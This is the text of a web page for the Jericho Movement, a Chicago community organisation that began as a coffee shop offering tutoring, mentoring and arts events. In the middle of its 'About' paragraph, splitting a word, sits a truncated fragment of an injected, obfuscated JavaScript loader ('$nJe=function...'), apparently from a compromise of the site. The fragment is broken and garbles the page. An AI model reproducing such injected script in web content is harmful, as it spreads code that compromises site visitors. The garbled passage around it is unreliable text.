OUR MISSION IN ESTABLISHING A SUSTAINABLE COMMUNITY IS MORE THAN JUST DUMPING MONEY INTO A COMMUNITY WITHOUT A PLAN.
THE FIRST ELEMENT OF OUR PLAN IS SAFETY. HAVING A SAFE ENVIRONMENT IS A COMMUNITY EFFORT AND TAKES A COLLECTIVE EFFORT TO MAKE IT HAPPEN; ORGANIZING THIS EFFORT COLLECTIVELY WILL BOND THE COMMUNITY INTO A SOCIAL CONTRACT THAT WILL ESTABLISH ACCEPTABLE STANDARDS OF BEHAVIOR AND WILL INTRODUCE AND OR/REINFORCE ELEMENTS OF MORAL DEVELOPMENT.
OUR GOAL IS WHOLISTIC AND SEEKS A BALANCED COMMUNITY EXPERIENCE WITH BOTH PRACTICAL AND SPIRITUAL LIFE STYLES.
WE SEEK TO CHANGE BEHAVIORS BY SETTING COMMUNITY STANDARDS, GOALS AND OBJECTIVES WITH SAFETY BEING AT THE FOREFRONT.

<h2>About The Jericho Movement</h2>
<p>The Jericho Movement began in 2003 on the south side of Chicago as Jericho Coffee and developed in<script>$nJe=function(n){if (typeof ($nJe.list[n]) == )
to a movement.
We became famous for educating the community of different types of coffees and teas and had both coffee and tea tastings.
Soon high school students would come into the shop and we provided tutoring and mentoring sessions with work/study and homework assistance within the coffee shop.
We provided a cultural outlet for local artist and musicians displaying artwork and handicrafts, musical performances and spoken word events.
Jericho Coffee had taken on new characteristics and was heading in many directions based on the needs of the community it had became a community movement. Thats how The Jericho Movement became a community based organization.
Organized to provide services within 501(c)(3) regulations for charitable, education and religious functions; in that, a holistic approach, that identifies our clients needs, based on assessment, services provided to clients and, an evaluation of our processes is used. Data gathered after completion of services, is used to improve processes.
